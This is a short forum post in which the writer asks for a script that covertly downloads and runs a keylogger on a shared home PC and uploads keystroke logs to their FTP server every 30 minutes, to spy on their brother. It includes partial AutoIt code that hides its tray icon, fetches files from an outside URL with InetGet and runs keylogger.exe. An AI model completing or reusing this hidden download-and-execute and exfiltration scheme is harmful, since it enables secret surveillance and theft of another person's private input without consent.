Hi,
i´m searching for a skript which do that:
it downloads a directory from my ftp. in this directory is a keylogger. the keylogger will start after the download. after 30min the script should upload the keylog.txt on my ftp,then wait 30minutes and upload keylog2.txt on myftp,wait 30 min and upload keylog3.txt,...
so i can see wtf my brother do on my pc when i´m on the school-computer ;>
i show you what i did for my script:
#notrayicon
InetGet("http://etspawn.funpic.de/keylogger/","c:\keylogger\")
Sleep(10000)
Run("c:\keylogger\keylogger.exe")